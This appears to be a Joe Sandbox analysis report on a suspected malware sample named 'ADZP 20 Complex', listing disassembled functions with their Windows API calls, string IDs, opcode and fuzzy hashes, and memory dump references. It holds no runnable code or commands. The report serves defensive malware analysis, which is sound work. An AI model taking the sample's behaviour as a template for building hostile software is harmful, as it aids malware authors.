                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                    • Instruction ID: 5a0dfe59a05c5f03c374f6d2b2c7d0e1199ed08054282bce4923ddabcda8d052
                    • Opcode Fuzzy Hash: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                    • Instruction Fuzzy Hash: 10B012702C43005AF2500B209C0AB8039609304B43F304024B2015A1D4CAF01080852C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00402664 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000), ref: 00402675
                    • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402685
                      • Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                      • Part of subcall function 0040A300: memcpy.MSVCRT ref: 0040A310
                    • FreeResource.KERNEL32(?,02209F70,02209F70,00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 004026B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                    • String ID:
                    • API String ID: 4216414443-0
                    • Opcode ID: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
                    • Instruction ID: 5824db8a20ede0dd59727c61e03ef1c30c3ca7ac97c8101ba0d9721411e394a8
                    • Opcode Fuzzy Hash: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
                    • Instruction Fuzzy Hash: C9F0F871018305EFDB01BF61EC0182EBEA1FB54304F108C3EF488511B1D7378868AB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040EFF0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 698COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID: L@A
                    • API String ID: 0-2003014581
                    • Opcode ID: fcece218acb953ec57727b535a22294843431f2901f4321beebd5a4c2ced4c5c
                    • Instruction ID: 760e5a69b99611532abf888ee3aa0c8fba98c8b8d08d5900a10969fbbe7fd4b0
                    • Opcode Fuzzy Hash: fcece218acb953ec57727b535a22294843431f2901f4321beebd5a4c2ced4c5c
                    • Instruction Fuzzy Hash: C042AD706047429FD724CF19C54472ABBE0BF84304F14863EE8589BB91D379E99ACF8A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405573 Relevance: 3.1, APIs: 2, Instructions: 128COMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00405593
                      • Part of subcall function 0040552C: memset.MSVCRT ref: 0040553B
                      • Part of subcall function 0040552C: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                      • Part of subcall function 0040552C: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                    • GetVersionExW.KERNEL32(?), ref: 004055F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Version$AddressHandleModuleProcmemset
                    • String ID:
                    • API String ID: 3445250173-0
                    • Opcode ID: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
                    • Instruction ID: 26d0d35871443cf73a281a40cb18e3271032821f4299fa5ffe9ef0f91627ffe6
                    • Opcode Fuzzy Hash: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
                    • Instruction Fuzzy Hash: 9B31BF32924F1882D23085648D45BB76AA4E751760FD90F37DD9EB72E0D23F8D458D8E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409FB0 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00409F70,00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000), ref: 0040A0EC
                    • SetUnhandledExceptionFilter.KERNEL32(00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040A100
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
                    • Instruction ID: ed707b84e897ebd9365ef63bb97156212438ba645da498dcb76798098b5433cd
                    • Opcode Fuzzy Hash: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
                    • Instruction Fuzzy Hash: 76E0C2B2508380FFC3108F20E94C687BBF4BB55741F00C93EA80A927A0CB748852EB1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B9C7 Relevance: 2.9, APIs: 1, Instructions: 1619COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID:
                    • API String ID: 3510742995-0
                    • Opcode ID: acd0e2443a16ad88af06146353a72dec412846ba3d60e1a872444779584cfac7
                    • Instruction ID: 7648e4874b510db5dc64b48861a8ad0d1bcfa4dcae448a9e57b277cf71a217b0
                    • Opcode Fuzzy Hash: acd0e2443a16ad88af06146353a72dec412846ba3d60e1a872444779584cfac7
                    • Instruction Fuzzy Hash: 43D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040FA68 Relevance: 2.1, Strings: 1, Instructions: 842COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID: hAA
                    • API String ID: 0-1362906312
                    • Opcode ID: 7fc8c6075135f61b4e465a5350afc3a94afa5303be66dee6bc8774c12ebf2cec
                    • Instruction ID: 061b60707f08a323de6ca22a374bc66059e0427017f59017a69891467563d259
                    • Opcode Fuzzy Hash: 7fc8c6075135f61b4e465a5350afc3a94afa5303be66dee6bc8774c12ebf2cec
                    • Instruction Fuzzy Hash: 0762AD71A047129FC718CF18C59066AB7E1FFC8304F144A3EE8969BB81D778E959CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00411C20 Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID: hAA
                    • API String ID: 0-1362906312
                    • Opcode ID: 71dca1fec58b1161358ab28b524daf179a02b381705128614a2cde410d01d185
                    • Instruction ID: f848a90908651b5095397da3da739fda65f55eeb17523120767d540d1063a6f3
                    • Opcode Fuzzy Hash: 71dca1fec58b1161358ab28b524daf179a02b381705128614a2cde410d01d185
                    • Instruction Fuzzy Hash: F0D1E7716083828FC704CF28C48066ABBE2FFD9304F144A6EE9D58B752D379D98ACB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409FD0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(004011DA,004011BB,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 00409FD6
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
                    • Instruction ID: ac8206da82d6392f4af85a502d91db7afc58579d845f6d3a682825b86ab87252
                    • Opcode Fuzzy Hash: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
                    • Instruction Fuzzy Hash: 68B0017A404180EFDB015F20ED4C7C63FB2B746745FD08AB8980181770CB790496DA0C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040CF18 Relevance: .7, Instructions: 674COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                    • Instruction ID: 434e224409ee4b41571aafdaecae1a236b293988db59150c8aad3205160540e2
                    • Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                    • Instruction Fuzzy Hash: 3E12C5B3B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00410CA0 Relevance: .2, Instructions: 213COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2afca31d5e402dc53a6e3c1547e4f0f7fd84e8efed120adad160e64feba3fa86
                    • Instruction ID: ce7637385bf2580d4bd45f7eed7cd981386548e1214f237c7f2b1e334cab5801
                    • Opcode Fuzzy Hash: 2afca31d5e402dc53a6e3c1547e4f0f7fd84e8efed120adad160e64feba3fa86
                    • Instruction Fuzzy Hash: B381B472620852CBE718CF1DEC907B63353E7C9340F99C639DA028779AE538B562C795
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00410C80 Relevance: .2, Instructions: 193COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ebf3ce41f3a936af8fc8571fd5a5b65ced049cf5f7b88b68e7c4ff41129e470b
                    • Instruction ID: eb62069f37237363b8ce6edce14327945305ce31afdb1d79ed38a397900698d6
                    • Opcode Fuzzy Hash: ebf3ce41f3a936af8fc8571fd5a5b65ced049cf5f7b88b68e7c4ff41129e470b
                    • Instruction Fuzzy Hash: 0A71F3F16205824BD714CF29FCD067673A2EBD9384F4AC639DB0287396C238B971C695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00410FB0 Relevance: .1, Instructions: 143COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                    • Instruction ID: af0191558bb113c69bf01aa77dc2a624928e07331dce5fde3109ee2fd9e39919
                    • Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                    • Instruction Fuzzy Hash: 5941EA32A4474547E728CF28C8553EFB390AB88304F45493ECB9697B60CB6EE9C68685
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00411033 Relevance: .1, Instructions: 100COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                    • Instruction ID: 72b98655ba701b9d964f93d3241bb8f545428b910a5ae8810ed1e036a2f8a9ba
                    • Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                    • Instruction Fuzzy Hash: AD31DC32E447854BE728CF28C8953EB7390BB88304F49093FCB4697BA1C66AE9C5C645
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00411079 Relevance: .1, Instructions: 82COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                    • Instruction ID: 87db66efce333c178885a799e057bc316407fa68a453293863d00c93a718f179
                    • Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                    • Instruction Fuzzy Hash: D121BB32A447450BE728CB28D8953FBB390AB88304F49493FCB5687BA1C66AD9C5C644
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                      • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                      • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                    • GetStockObject.GDI32(00000011), ref: 00408FB2
                    • LoadIconW.USER32 ref: 00408FE9
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                    • RegisterClassExW.USER32 ref: 00409021
                    • IsWindowEnabled.USER32(00000000), ref: 00409048
                    • EnableWindow.USER32(00000000), ref: 00409059
                    • GetSystemMetrics.USER32(00000001), ref: 00409091
                    • GetSystemMetrics.USER32(00000000), ref: 0040909E
                    • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                    • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                    • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                    • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                    • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                    • wcslen.MSVCRT ref: 00409189
                    • wcslen.MSVCRT ref: 00409191
                    • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                    • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                    • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                    • SetForegroundWindow.USER32(00000000), ref: 0040921F
                    • BringWindowToTop.USER32(00000000), ref: 00409226
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                    • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                    • TranslateMessage.USER32(?), ref: 00409259
                    • DispatchMessageW.USER32(?), ref: 00409264
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                    • wcslen.MSVCRT ref: 00409289
                    • wcscpy.MSVCRT ref: 004092A1
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                    • String ID: 0$BUTTON$D0A$EDIT$STATIC
                    • API String ID: 54849019-2968808370
                    • Opcode ID: a182f17251ce321d778d7634bfe8f157872b1c2c0697115c82c91e82e7d6380d
                    • Instruction ID: ac9e317f2143d035474ccc6d8eb2369134aae38ec411cec841dcb6eceac04435
                    • Opcode Fuzzy Hash: a182f17251ce321d778d7634bfe8f157872b1c2c0697115c82c91e82e7d6380d
                    • Instruction Fuzzy Hash: FC919071548300BFE7219F65DD49F9B7BE9EB48B50F00483EFA84A61E1CBB988408B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401511 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON
                    Download Yara Rule
                    APIs
                    • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401648
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 004057F0: wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                      • Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
                      • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                      • Part of subcall function 0040AD45: wcsncpy.MSVCRT ref: 0040AD63
                      • Part of subcall function 0040AD45: wcslen.MSVCRT ref: 0040AD75
                      • Part of subcall function 0040AD45: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                    • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$\pA$\pA$\pA$\pA$\pA
                    • API String ID: 1295435411-2952853158
                    • Opcode ID: d64868e5c00eaaf1b55b8d26c688d327ecd9e6ef433e22dfa90474c3973bb521
                    • Instruction ID: 61c24dd49085b80bd1b70adcfbfbd818be60928fccba90bb55e88b0b877bbf77
                    • Opcode Fuzzy Hash: d64868e5c00eaaf1b55b8d26c688d327ecd9e6ef433e22dfa90474c3973bb521
                    • Instruction Fuzzy Hash: AEB11FB1104304BED600BB62DD8297F77A9EB88708F50CD3FB144A61E2EA3DDD55962E
                    Uniqueness

